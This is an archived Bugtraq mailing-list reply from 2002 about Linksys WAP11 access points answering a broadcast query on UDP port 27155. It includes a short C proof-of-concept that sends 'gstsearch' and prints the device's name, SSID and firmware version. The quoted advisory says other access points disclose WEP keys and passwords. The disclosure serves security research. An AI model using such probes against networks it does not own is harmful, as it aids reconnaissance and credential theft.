[27776] in bugtraq
Re: Accesspoints disclose wep keys, password and mac filter (fwd)
daemon@ATHENA.MIT.EDU (Thomas Sarlandie)
Fri Nov 8 22:59:48 2002
Message-ID: <3DC7D487.4030100@altern.org>
Date: Tue, 05 Nov 2002 15:24:07 +0100
From: Thomas Sarlandie <sarfata@altern.org>
MIME-Version: 1.0
To: Tom Knienieder <knienieder@khamsin.ch>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Hi,
Linksys WAP11-V2.2 seems to be vulnerable in a different way. It only
returns AP's name,
SSID and firmware version. Except for firmware version, those are not
private informations.
Quickly patched proof of concept :
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/socket.h>
typedef struct {
char type[28];
char blank1[8];
char apname[32];
char firmware[6];
char blank2[11];
char ssid[32];
}
__attribute__ ((packed)) answer;
int main()
{
char rcvbuffer[1024];
struct sockaddr_in sin;
answer* ans = (answer *)rcvbuffer;
int sd, ret, val;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr("255.255.255.255");
sin.sin_port = htons(27155);
sd = socket(AF_INET, SOCK_DGRAM, 0);
if (sd < 0)
perror("socket");
val = 1;
ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val, sizeof(val));
if (ret < 0)
{
perror("setsockopt");
exit(1);
}
ret = sendto(sd, "gstsearch", 9, 0, &sin, sizeof(struct sockaddr));
if (ret < 0)
{
perror("sendto");
exit(1);
}
ret = read(sd,&rcvbuffer,sizeof(rcvbuffer));
if (ret > 0)
{
printf("Type : %s\n", ans->type);
printf("Announced Name : %s\n", ans->apname);
printf("Firmware version : %s\n", ans->firmware);
printf("SSID : %s\n", ans->ssid);
}
else
perror("read");
return 0;
}
thomas
>KHAMSIN Security News
>KSN Reference: 2002-11-01 0001 ULO
>---------------------------------------------------------------------------
>
>Title
>-----
> Accesspoints disclose wep keys, password and mac filter
>
>Date
>----
> 2002-11-01
>
>
>
>
>
